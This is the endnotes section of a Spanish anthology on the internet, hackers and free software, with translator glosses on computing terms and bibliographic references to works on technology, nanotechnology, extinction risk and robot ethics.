[85]Neal Stephenson le rinde homenajeen su novela Criptonomicón, en laescena en que describe una complejateoría del hacker Randy Waterhousesobre las maneras de comer cereales.<<

Page 880: Internet, hackers y software li   varios

[86]Joseph Weizenbaum, Computerpower and human reason: from judgmentto calculation. San Francisco, W.H.Freeman, 1976 (hay trad. cast.: Lafrontera entre el ordenador y la mente.Madrid, Pirámide, 1978). (N. del E.)<<

Page 881: Internet, hackers y software li   varios

[87]Hay trad. inglesa: Copyright does notexist, enhttp://svenskefaen.no/cdne/ (N.

del. E) <<

Page 882: Internet, hackers y software li   varios

[88]Hay versión en Internet:http://www.eff.org/Misc/Publications/Bruce_Sterling/Hacker_Crackdown/

(hay trad. cast.: La caza de hackers,http://banners.noticiasdot.com/termometro/boletines/docs/consultoras/hackers/75-

Lacazade272621.pdf ). (N. del E.). <<

Page 883: Internet, hackers y software li   varios

[89]«La destrucción de la concienciaindividual representa por lo tanto un altaidea de cultura, una idea profunda de lacultura de donde deriva una formatotalmente nueva de civilización. Nosentirse vivo en tanto que individuo, esel precio a pagar por escapar de estaforma temible de capitalismo que yollamo capitalismo de la concienciaporque el alma es propiedad de todos.»(N. del T.). <<

Page 884: Internet, hackers y software li   varios

[90]Sin restricciones por derechos deautor. (N. del T.). <<

Page 885: Internet, hackers y software li   varios

[91] Computadora central que asume eltrabajo de procesar los datos, a la quese conectaban los usuarios a través determinales. (N. del T.)<<

Page 886: Internet, hackers y software li   varios

[92] Por Rupert Murdoch, dueño de laempresa de noticias y entretenimiento20th Century Fox. (N. del T.). <<

Page 887: Internet, hackers y software li   varios

[93]Initial Public Offer: Primera ofertapública de acciones de una compañía.(N. del T.) <<

Page 888: Internet, hackers y software li   varios

[94]Código fuente significa unaformulación de instrucciones expresadasen un lenguaje interpretable por unacomputadora y ligado, por lo tanto, a unaserie de patrones lógicos ycondicionales que, una vez interpretadosy puestos en marcha, producen unresultado. Este resultado varía según lascondiciones externas consideradas porel código fuente, las cuales son el mediopor el que nosotros interactuamos con suejecución. Cada lenguaje está definidopor una gramática que, eventualmente, esinterpetada por un compilador que«metaboliza» su contenido semántico

Page 889: Internet, hackers y software li   varios

(instrucciones) y produce así un «códigobinario» en condiciones de serejecutado por la computadora.<<

Page 890: Internet, hackers y software li   varios

[95]El término algoritmo deriva delnombre de Muhammad Bin Musa al-Khwarizmi, matemático que vivió enBagdad entre 813 y 833 D.C.<<

Page 891: Internet, hackers y software li   varios

[96] Esta combinación de caracteresdesencadena un ciclo ad infinitum deejecución de programas/procesos queinevitablemente terminan por saturar lamemoria de la computadora, haciendocolapsar el sistema. Estas creacionesconocidas como «bombas lógicas» sonampliamente utilizadas por hackers endiversos sistemas operativos comoWindows o Unix. La «bomba» creadapor jaromil es considerada, por lejos,con sus 13 caracteres y su aspectoinofensivo, la más breve y elegante detodas las conocidas hasta el momento.(N. del T.)<<

Page 892: Internet, hackers y software li   varios

[97]Bug: error en un programa que pasadesapercibido para sus creadores. Losbugs de los programas comercialescomo Windows son empleados a vecespor los hackers para superar laseguridad de los sistemas sin serdescubiertos. (N. del T.)<<

Page 893: Internet, hackers y software li   varios

[98]«Intellectual Property: the Attack onPublic Space in Cyberspace» (enhttp://www.gseis.ucla.edu/~howard/Papers/pw-

public-spaces.html/ ) por HowardBesser, profesor asociado en la Escuelade Educación e Información de la UCLA[University of California in LosAngeles], quien describe cómo diversasindustrias están usando su influencia y elcopyright para limitar el acceso públicoen vastas zonas de Internet.<<

Page 894: Internet, hackers y software li   varios

[99]Compilación realizada por el propioSterling, Mirrorshades: una antologíaciberpunk. Madrid, Siruela, 1998. (N.del E.) <<

Page 895: Internet, hackers y software li   varios

[100] Fenómeno de renovación religiosaprotagonizado por predicadores querecorrían las colonias británicas enAmérica entre 1720 y 1760. (N. del E.)<<

Page 896: Internet, hackers y software li   varios

[101]Comunidad de artistas fundada en1848 en Inglaterra que aspiraba arecuperar los principios y prácticasartísticas que creían característicos delarte italiano antes de Rafael. (N. delE.)<<

Page 897: Internet, hackers y software li   varios

[102]The age of spiritual machines: Whencomputers excede human intelligence.London, Penguin, 1999 (hay trad. cast.:La era de las máquinas espirituales:Cuando las computadoras superen lamente humana. Barcelona, Planeta,1999). (N. del E.)<<

Page 898: Internet, hackers y software li   varios

[103]El pasaje que Kurzweil citapertenece al Manifiesto de Kaczynski, elUnabomber, el cual fue publicadoentero, bajo extorsión, por The NewYork Times y The Washington Post enun intento por terminar con su campañade terror. Acuerdo con David Gelernter,que dijo acerca de esta decisión: «Fueuna decisión dura para los diarios.Aceptar era ceder frente al terrorismo, ypor lo que sabían, de cualquier forma élestaba mintiendo. Por otro lado, aceptarpodría detener las muertes. Habíatambién una posibilidad de que alguienleyera el texto y diera alguna pista sobre

Page 899: Internet, hackers y software li   varios

el autor; y eso es exactamente lo quepasó. El hermano del sospechoso loleyó, y llamó a la policía.» «Yo hubieradicho que no lo publicaran. Por suerteno me preguntaron.» (Drawing Life:Surviving the Unabomber. Free Press,1997. p. 120)<<

Page 900: Internet, hackers y software li   varios

[104]Garrett, Laurie, The coming plague:newly emerging diseases in a world outof balance. London, Penguin, 1994. pp.47-52, 414, 419, 452. <<

Page 901: Internet, hackers y software li   varios

[105]Moravec, Hans P., Robot: MereMachine to Trascendental Mind. NewYork, Oxford University Press, 1999.(N. del E.) <<

Page 902: Internet, hackers y software li   varios

[106]Isaac Asimov describió lo que seconvertiría en la visión más célebreacerca de reglas éticas para elcomportamiento de los robots en sulibro Yo, Robot, de 1950, con sus TresLeyes de la Robótica [hay trad. cast. Yo,robot. Buenos Aires, Sudamericana,1977]:1.Un robot nunca debe dañar a un serhumano, o por inacción, permitir que unser humano resulte dañado.2. Un robot debe obedecer las órdenesprovenientes de un ser humano, exceptocuando estas órdenes entren encontradicción con la Primera Ley.

Page 903: Internet, hackers y software li   varios

3. Un robot debe proteger su propiaexistencia, siempre y cuando estaprotección no entre en contradicción conla Primera o la Segunda Ley. <<

Page 904: Internet, hackers y software li   varios

[107]Ver «Test of time», en Wired, Nº8.03, año 8, marzo de 2000. p. 78 (hayversión en Internet:http://www.wired.com/wired/archive/8.03/eword.html?

pg=2/ ). <<

Page 905: Internet, hackers y software li   varios

[108]De «auto-replicate»: hacer copiasde sí sin ayuda exterior. (N. del. T.)<<

Page 906: Internet, hackers y software li   varios

[109]Miguel Ángel escribió un soneto queempieza así:Non ha l´ottimo artista alcun concettoCh´ un marmo solo in sè noncirconscrivaCol suo soverchio; e solo a quelloarrivaLa man che ubbidisce all´ intelleto.No tenía el mejor de los artistaspensamiento que mostrarQue la piedra áspera en su superfluacubiertaNo traiga ya; romper el hechizo delmármolEs todo a lo que la mano que sirve al

Page 907: Internet, hackers y software li   varios

intelecto puede aspirar.Stone describe el proceso:

No trabajaba a partir de sus dibujoso modelos de arcilla, a todos los habíadejado de lado. Estaba esculpiendo delas imágenes en su mente. Sus ojos ysus manos sabían donde debíanemerger cada línea, curva, espesor, y aqué profundidad en el corazón de lapiedra para crear el bajo relieve.(The Agony and the Ecstasy. GardenCity, Doubleday, 1961. pp. 6, 144 [haytrad. cast.: La agonía y el éxtasis: vidade Miguel Ángel. Buenos Aires, Emecé,1978].) <<

Page 908: Internet, hackers y software li   varios

[110] Según la ley de Moore cadaveinticuatro meses la industria de lainformática logra duplicar la cantidad detransistores instalados en un circuitointegrado del mismo tamaño y costo deproducción. La Ley ha venidocorroborándose desde 1975. (N. del T.)<<

Page 909: Internet, hackers y software li   varios

[111]«Downloading», término utilizadoen informática para referirse a un envíode datos de una computadora a otra,generalmente separadas y comunicadasen red o por módem (N. del T.) <<

Page 910: Internet, hackers y software li   varios

[112]Ver Lovins, Amory B. y Lovins, L.Hunter, «A Tale of Two Botanies», enWired, Año 8, Nº 8.04, abril de 2000. p.247 (hay versión en internet:http://www.wired.com/wired/archive/8.04/botanies.html/

) < <

Page 911: Internet, hackers y software li   varios

[113] Drexler, K. Eric, Engines ofCreation: The coming era ofNanotechnology. Doubleday, New York,1986 (hay versión en internet:http://www.foresight.org/EOC/index.html/

) (hay trad. cast.: La nanotecnología: elsurgimiento de las máquinas decreación. Barcelona, Gedisa, 1993). (N.del E.). <<

Page 912: Internet, hackers y software li   varios

[114]Drexler, K. E., Peterson, C. yPergamit, G., Unbounding the Future:The Nanotechnology Revolution. NewYork, William Morrow, 1991 (hayversión en internet:http://www.foresight.org/UTF/Unbound_LBW/index.html/

). (N. del E.). <<

Page 913: Internet, hackers y software li   varios

[115]>First Foresight Conference onNanotechnology, octubre de 1989,charla titulada «The future ofcomputation». Publicado en Crandall,B.C. y Lewis, J. (eds.), Nanotechnology:Research and Perspectives. Cambridge,MIT Press, 1992. p. 269.<<

Page 914: Internet, hackers y software li   varios

[116]En su novela de 1963, Cat´sCraddle, Kurt Vonnegut imaginó unaccidente estilo «fango gris» donde unaforma de hielo llamada hielo-nueve, quese hace sólida a temperaturas muchomayores, congela los océanos [hay trad.cast.: Cuna de gato. Barcelona,Anagrama, 1988]. <<

Page 915: Internet, hackers y software li   varios

[117]Kauffman, Stuart, «Self-replication:Even Peptides Do It», en Nature, Nº382, 8 de agosto de 1996, p. 496. Ver[versión en internet]http://www.santafe.edu/sfi/People/Kauffman/sak-

peptides.html/ <<

Page 916: Internet, hackers y software li   varios

[118]Pale blue dot: a vision of the humanfuture in space. New York, RandomHouse, 1994 (hay trad. cast.: Un puntoazul pálido: una visión del futurohumano en el espacio. Barcelona,Planeta, 1995). (N. del E.)<<

Page 917: Internet, hackers y software li   varios

[119]Visions of technology: a century ofvital debate about machines, systems,and the human world. New York, Simon& Schuster, 1999. (N. del E.). <<

Page 918: Internet, hackers y software li   varios

[120]Else, Jon, The Day After Trinity: J.Robert Oppenheimer and The AtomicBomb (disponible enhttp://www.pyramiddirect.com/

). <<

Page 919: Internet, hackers y software li   varios

[121]Esta estimación está en el libro de[John] Leslie, The End of the World:The Science and Ethics of HumanExtinction, donde señala que laprobabilidad de extinción, essustancialmente mayor si aceptamos elargumento del Fin del Mundo deBrandon Carter, que consiste,brevemente, en que debemos sentircierto rechazo a creer que estamosentre los primeros, por ejemplo entre elprimer 0,001 por ciento de todos loshumanos que algún día habrán devivir.

Con esto podemos pensar que la

Page 920: Internet, hackers y software li   varios

humanidad no sobrevivirá muchossiglos más, ya no hablemos decolonizar la galaxia. El argumento delFin del Mundo de Carter no generaestimaciones de riesgo por sí mismo.Su fin es revisar las estimaciones querealizamos cuando consideramos losdiversos peligros posibles. (London,Routledge, 1996. pp. 1, 3, 145.) <<

Page 921: Internet, hackers y software li   varios

[122] Clarke, Arthur C., «Presidents,Experts, and Asteroids», en Science, 5de junio de 1998. Republicado como«Science and Society», en Greetings,carbon-based bipeds! Collected Essays,1934-1998. New York, St. Martin’ sPress, 1999. <<

Page 922: Internet, hackers y software li   varios

[123]Y, como sugiere David Forrest en sutrabajo «Regulating NanotechnologyDevelopment» [Regulando el Desarrollode la Nanotecnología], disponible enhttp://www.foresight.org/NanoRev/Forrest1989.html/

Si adoptamos un criterio deresponsabilidad estricta comoalternativa a la regulación, seríaimposible para cualquier laboratorio oentidad, internalizar los costos delriesgo (destrucción de la biosfera), porlo que en teoría, el desarrollo de lananotecnología nunca deberíaemprenderse. El análisis de Forrestnos deja sólo con la regulación

Page 923: Internet, hackers y software li   varios

gubernamental una idea nadaconfortable. <<

Page 924: Internet, hackers y software li   varios

[124]Meselson, Matthew, «The Problemof Biological Weapons», presentaciónen la Reunión de la American Academyof Artes and Science [Academia deArtes y Ciencias de EE.UU], 13 deenero de 1999 (verhttp://www.pugwash.org/reports/cbw/cbw5.htm/

). <<

Page 925: Internet, hackers y software li   varios

[125]Doty, Paul, «The Forgotten Menace:Nuclear Weapons Stockpiles StillRepresents the Biggest Threat toCivilization», en Nature, Nº 402, 9 dediciembre de 1999, p. 583. <<

Page 926: Internet, hackers y software li   varios

[126]Ver también la carta de 1997 deHans Bethe al presidente Clinton, enhttp://www.fas.org/bethecr.htm .

<<

Page 927: Internet, hackers y software li   varios

[127]Se refiere a sistemas decomputación como JAVA y JINI,diseñados para conectar en red aaparatos electrónicos de todo tipo,computadoras, teléfonos, edificios,etc.(N. del T.). <<

Page 928: Internet, hackers y software li   varios

[128]Hamilton, Edith, The Greek Way.New York, Norton, 1942. p. 35.<<